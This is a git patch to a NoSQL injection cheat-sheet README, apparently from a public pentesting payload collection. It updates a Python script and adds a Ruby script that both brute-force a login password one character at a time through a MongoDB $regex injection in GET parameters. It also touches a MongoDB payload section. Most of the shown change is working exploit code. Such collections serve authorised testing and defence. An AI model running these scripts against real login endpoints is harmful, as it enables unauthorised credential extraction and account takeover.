From 7e2fa15462fa8b9e8dfb0215c4ad4b4f4e81f248 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 23 Sep 2022 00:36:41 +0200 Subject: [PATCH] Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script --- NoSQL Injection/README.md | 39 ++++++++++++++++++++++++++++++++++++--- 1 file changed, 36 insertions(+), 3 deletions(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 5ae3a78..12fbf15 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -11,6 +11,7 @@ * [Extract data information](#extract-data-information) * [Blind NoSQL](#blind-nosql) * [POST with JSON body](#post-with-json-body) + * [POST with urlencoded body](#post-with-urlencoded-body) * [GET](#get) * [MongoDB Payloads](#mongodb-payloads) * [References](#references) @@ -84,6 +85,7 @@ Extract data with "in" ### POST with JSON body +python script: ```python import requests @@ -109,6 +111,8 @@ while True: ### POST with urlencoded body +python script: + ```python import requests import urllib3 @@ -133,6 +137,8 @@ while True: ### GET +python script: + ```python import requests import urllib3 @@ -147,13 +153,40 @@ u='http://example.org/login' while True: for c in string.printable: if c not in ['*','+','.','?','|', '#', '&', '$']: - payload='?username=%s&password[$regex]=^%s' % (username, password + c) + payload=f"?username={username}&password[$regex]=^{password + c}" r = requests.get(u + payload) if 'Yeah' in r.text: - print("Found one more char : %s" % (password+c)) + print(f"Found one more char : {password+c}") password += c ``` +ruby script: + +```ruby +require 'httpx' + +username = 'admin' +password = '' +url = 'http://example.org/login' +# CHARSET = (?!..?~).to_a # all ASCII printable characters +CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-' +GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$'] +session = HTTPX.plugin(:persistent) + +while true + CHARSET.each do |c| + unless GET_EXCLUDE.include?(c) + payload = "?username=#{username}&password[$regex]=^#{password + c}" + res = session.get(url + payload) + if res.body.to_s.match?('Yeah') + puts "Found one more char : #{password + c}" + password += c + end + end + end +end +``` + ## MongoDB Payloads ```bash @@ -185,4 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) -* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) \ No newline at end of file +* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)